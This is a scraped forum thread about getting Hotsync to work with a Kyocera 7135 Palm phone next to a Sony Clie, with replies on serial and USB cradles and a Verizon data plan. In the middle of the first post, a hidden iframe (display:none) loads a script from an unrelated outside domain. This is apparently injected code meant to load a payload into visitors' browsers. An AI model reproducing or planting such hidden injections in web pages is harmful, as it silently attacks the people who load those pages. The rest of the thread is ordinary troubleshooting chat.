+ Reply to Thread

Awright, I Pulled The Trigger!!

I got mine today (local Verizon store, $399, added the $44.99 package to my plan) Anyway, I'm stuck!! I can't establish a connection for Hotsync! I am also using a Sony Clie (which I want to contiue using). I even installed the 7135 Palm desktop, established a new user in the tools option, and still no luck! BTW even my Clie won't hotsync now!
    HELP!!!!!!!!!!!!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Ok, I'm starting to go crazy! Can I have one palm connected with a serial and one with USB? Also, do you have to name the palm itself? I mean in addition to setting up a user? Any help would be greatly appreciated.

You can have a cradle hooked up via serial in addition to one hooked up via USB. This is how I have mine set up. The 7135 via USB and my wife's Palm Vx via serial. No problems. I have no experience with the Clie or the desktop software which ships with it. If I were in your situation, I would completely uninstall Hotsync then re-install the 7135 desktop software. Verify that your 7135 is synching, then add the CLIE cradle to see if you can synch that as well.

Good luck,
    falstaffpac

Thanks! I'll try it!

jeh
    What "44.99 package"????

Originally posted by jeh
    What "44.99 package"????
    I believe he's referring to the new unlimited express network plan. Still too much money for PDA usage, IMHO.
    ---------------
    The same thing we do every night, Pinky...

jeh
    Ah, THAT $44.99/mo.... I'm looking at it as a way around hotels' lousy phone lines for data calls.

jeh
    Lars: You haven't "pullled the trigger" until the 15 day return period is up.

Well said! even though I have had appx. 6 "Fatal resets in the past 12 hour....I added my own MP3 ringers and flip sounds, transfered 3 CD's worth of music to a 256 mb card, and surfed the web silly style. It is ultra cool!!!